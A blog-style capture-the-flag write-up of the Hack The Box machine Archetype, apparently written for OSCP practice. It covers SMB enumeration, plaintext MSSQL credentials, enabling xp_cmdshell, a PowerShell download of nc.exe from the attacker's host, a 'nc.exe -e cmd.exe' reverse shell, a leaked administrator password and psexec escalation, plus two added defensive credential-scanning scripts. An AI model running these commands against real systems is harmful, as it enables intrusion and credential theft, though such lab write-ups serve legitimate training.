Box 1: HTB - Archetype

This is the 1st box in my journey to OSCP exam.

Victor Le
Aug 14, 2021 (8 min read)

Enumeration

Normally, I use Nmap to begin my port scanning and reconnaissance. For an explanation of the nmap syntax and its parameters, visit this site: https://explainshell.com/

nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.27 --open

PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     syn-ack ttl 127 Microsoft SQL Server 2017 14.00.1000.00; RTM
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00

Oh, let me check what we found:

  • Ports 5985 and 47001 are HTTP services, but they are served by the Windows HTTP API rather than a web site: I tried accessing them in a browser without success, and directory enumeration with dirsearch and dirb turned up nothing.
  • The dynamic ports (49664–49669) are high port numbers which I was going to ignore, though I still looked for clues. I found that many services rely on the Remote Procedure Call (RPC) or DCOM features in Microsoft Windows to assign them dynamic TCP ports. Specifically, these are local ports used by Task Scheduler, Spooler, Eventlog and Skype. You can’t disable them unless you stop the processes listening on them. Check this.

Nevertheless, I identified the ports I thought were interesting: 139, 445 and 1433.

  • Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
  • Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the Internet.
  • Port 1433: Microsoft’s SQL Server, including the desktop editions that are often silently installed with other Microsoft applications, opens and services queries delivered over incoming TCP connections through this port.

Next, it is worth checking whether anonymous access is permitted, as file shares often store configuration files containing passwords or other sensitive information. We can use smbclient to list the available shares with no username and no password: option -L lists the shares available on a host, and option -N (or --no-pass) tells it not to prompt for a password.

smbclient -N -L //10.10.10.27

“backups” share is suspicious

Great, there are two available shares with read access:

  • IPC$: this hidden share is a special share used for inter-process communication. It doesn’t allow one to access files or directories like other shares, but rather allows one to communicate with processes running on the remote system.
  • backups: a normal share with read access. It lacks a comment which means it could contain interesting data if we’re able to connect to it.

As usual, “backups” is an interesting share to start with, so let’s connect to it and see what’s inside, using the command below:

smbclient -N //10.10.10.27/backups

First, use help to list all the commands available here. Then use dir to list everything the share contains. Yup, this directory contains an interesting file called “prod.dtsConfig”. You can’t use cat or type here to view the content of the file, so I used the get <file name> command to download it to my local machine, where I could open it with cat.

User ID & Password for Microsoft SQL login

Haha, the two helpful pieces of information were the User ID and Password, and I’m sure, as you are, that they’re used to access the MS SQL service. Now we need an SQL client tool to access the database, such as SSMS on a Windows machine, though I’m using Kali.
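The reason prod.dtsConfig is so valuable is that SSIS package configuration files store the whole OLE DB connection string, password included, as plain text. As an added example (not part of the original write-up), the Python below parses a constructed .dtsConfig in that shape, flags any connection string carrying a Password or Pwd key, and produces a redacted copy suitable for a report; the password value is a placeholder, not the box's real one.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of an SSIS package configuration (.dtsConfig)
# file. The real prod.dtsConfig is not reproduced; the password is a placeholder.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=PLACEHOLDER_PASSWORD;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Connection-string keys that carry a secret (compared case-insensitively).
SECRET_KEYS = {"password", "pwd"}


def parse_connection_string(value):
    """Split an OLE DB style 'Key=Value;Key=Value' string into a dict."""
    pairs = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            pairs[key.strip()] = val.strip()
    return pairs


def redact_connection_string(value):
    """Return the connection string with every secret value masked."""
    pattern = r"(?i)\b(" + "|".join(SECRET_KEYS) + r")=[^;]*"
    return re.sub(pattern, r"\1=***", value)


def find_plaintext_credentials(xml_text):
    """Return one finding per <Configuration> whose ConfiguredValue is a
    connection string that embeds a plaintext secret."""
    findings = []
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        raw = conf.findtext("ConfiguredValue") or ""
        pairs = parse_connection_string(raw)
        secret_keys = [k for k in pairs if k.lower() in SECRET_KEYS]
        if secret_keys:  # only report entries that actually leak a secret
            findings.append({
                "path": conf.get("Path"),
                "user": pairs.get("User ID"),
                "secret_keys": secret_keys,
                "redacted": redact_connection_string(raw),
            })
    return findings
```

Running find_plaintext_credentials over every .dtsConfig found on a readable share is a quick way for a defender to audit what a backups folder like this one exposes.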

Foothold

After searching on Google, a lot of pentesters recommend a script called “mssqlclient.py” from the Impacket tool suite, which is installed on Kali. First, move to the directory of the Impacket example scripts. Then use the script to log in to the MS SQL database:

cd /usr/share/doc/python3-impacket/examples/

python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

mssqlclient.py options:

  • -h | --help: show usage and all optional arguments
  • -windows-auth: whether or not to use Windows Authentication (default False)

After a successful login, we can use the IS_SRVROLEMEMBER function to reveal whether the current SQL user holds the sysadmin (highest level) role on the SQL Server. This works, and we do indeed have sysadmin privileges. Syntax:

SELECT IS_SRVROLEMEMBER('sysadmin')

The result returned is 1, which indicates that we have the sysadmin role. This will allow us to enable xp_cmdshell and gain RCE on the host. Run help to show what we can do here.

enter “help”

As you can see, we can use enable_xp_cmdshell to enable xp_cmdshell and go ahead. Alternatively, we can do the same thing by hand. Let’s try that by entering the commands below:

SQL> EXEC sp_configure 'show advanced options', 1
SQL> RECONFIGURE
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> RECONFIGURE
SQL> xp_cmdshell "whoami"
If you can see this command’s output, congratulations!

Great, so we now know that we are sysadmin and that we can execute commands. The next thing I did was try to spawn a reverse-shell connection to my Kali machine. After a bit of research, I found that one way to get the reverse shell is to host the reverse-shell binary somewhere on my Kali and then have the SQL server connect to my Kali machine, download it and execute it.

I decided to use a familiar tool to connect the SQL server back to my Kali: Netcat. So turn off your anti-virus software temporarily and download it here.

Let’s host this nc.exe somewhere on your Kali. Change into the directory containing nc.exe and start a web server on port 80 (HTTP) to serve it:

python -m SimpleHTTPServer 80

Port 80 (HTTP) is listening …

Back on the SQL server, try this command to download nc.exe from my Kali web server. Note that 10.10.14.113 is my Kali IP address.

xp_cmdshell "powershell wget http://10.10.14.113:80/nc.exe"

An error occurred … read the warning carefully

Try again with the options below, and remember to define an output path so the file is easy to locate on the target afterwards:

xp_cmdshell "powershell wget -UseBasicParsing http://10.10.14.113:80/nc.exe -OutFile %temp%/nc.exe"

Note: here %temp% expands to the sql_svc user’s temp directory, so the file ends up at C:\Users\sql_svc\AppData\Local\Temp\nc.exe

SQL server downloaded nc.exe successfully from Kali machine

After that, in another window we spawn a Netcat listener listening on port 443:

nc -lvnp 443

At last, let’s launch our executable “nc.exe”, which will connect back to our Netcat listener. For more about Netcat syntax, please check this.

xp_cmdshell "%temp%/nc.exe -nv 10.10.14.113 443 -e cmd.exe"

Yup!! We got this!

We’ve got a command shell on the SQL server; the shell we receive runs as the sql_svc account. Check this user’s Desktop and you will see user.txt, which contains the flag.

“type” command to view content of file…

Privilege Escalation

Well, now that we have the user’s flag, we need to get the administrator flag too. There was only one problem: I had no idea where to go next, so I had to research Windows privilege escalation techniques. Here I stumbled upon a very helpful checklist.

The systeminfo command didn’t help much apart from identifying the OS version as “Microsoft Windows Server 2019 Standard”.

Next, following the checklist, I checked the environment variables with the SET command, but nothing new or interesting was found.

PowerShell history was next on the checklist. I first needed to find the path where it is stored and, after a short Google search, I found a useful article. The location of the file can be identified using the Get-PSReadlineOption command and looking for the HistorySavePath key.

The located path is:
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Thank God! It’s here…

Let’s check what the “net.exe use” command does by looking at the documentation. The net use command is a Command Prompt command used to connect to, remove, and configure connections to shared resources, like mapped drives and network printers. So this command maps the \\Archetype\backups shared resource to a new drive called “T:” with the credentials needed to connect to it - administrator:MEGACORP_4dm1n!!
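The PSReadLine history file and the net use line it contained are exactly the kind of artifact a defender should sweep for: a password passed as a positional argument to net use is written to ConsoleHost_history.txt in the clear. As an added example (not code from the original write-up), the Python below parses net use commands from a constructed history file, reports the lines where a password was given on the command line, and keeps the password itself out of the report.

```python
import re

# Constructed ConsoleHost_history.txt content (not the box's real file); the
# 'net.exe use' line mirrors the one the write-up describes. '*' means "prompt".
SAMPLE_HISTORY = """Get-ChildItem
net.exe use T: \\\\Archetype\\backups /user:administrator MEGACORP_4dm1n!!
net use S: \\\\fileserver\\share * /user:CORP\\bob
Get-Process
"""

# net[.exe] use [drive:] \\server\share [password | *] [/user:[domain\]name] [/switches]
NET_USE_RE = re.compile(
    r"^net(?:\.exe)?\s+use\s+(?:(?P<drive>[A-Za-z]:)\s+)?(?P<share>\\\\[^\s]+)(?P<rest>.*)$",
    re.IGNORECASE,
)
USER_RE = re.compile(r"/user:(?P<user>\S+)", re.IGNORECASE)


def parse_net_use(line):
    """Return the pieces of a 'net use' command, or None if the line is not one."""
    m = NET_USE_RE.match(line.strip())
    if not m:
        return None
    rest = m.group("rest")
    user = USER_RE.search(rest)
    # The password is the only positional token after the share; switches start with '/'.
    positional = [t for t in rest.split() if not t.startswith("/")]
    return {
        "drive": m.group("drive"),
        "share": m.group("share"),
        "user": user.group("user") if user else None,
        "password": positional[0] if positional else None,
    }


def find_credentials_in_history(text):
    """Flag history lines where a real password (not '*') was typed on the command
    line. Only the password's length is reported so the output is safe to share."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_net_use(line)
        if entry and entry["password"] and entry["password"] != "*":
            findings.append({
                "line": lineno,
                "share": entry["share"],
                "user": entry["user"],
                "password_length": len(entry["password"]),
            })
    return findings
```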

Now we need to find a way to connect to the machine as that user, with something similar to SSH. Here is a list of tools I found that could help with the situation. The next tool in line was the psexec.py script from the Impacket library. Documentation about the original PsExec from Sysinternals can be found here. This tool lets us connect to a remote Windows host, and by combining it with the credentials we gathered, we can connect to the host and gain admin access.

More about “Impacket”: we can connect to the victim machine remotely using this Python library, which you can download from here. Many other tools in it can be used for RCE; let’s go check this.

“whoami” command shows you got SYSTEM…

After gaining admin access, we simply traverse to Administrator’s desktop and read the root flag (I wouldn’t disclose it).

Finally, this is my 1st story on Medium and also the 1st box on my journey to the OSCP exam. I’ll try to fill in more details when possible.

THANKS FOR READING AND SUPPORTING!
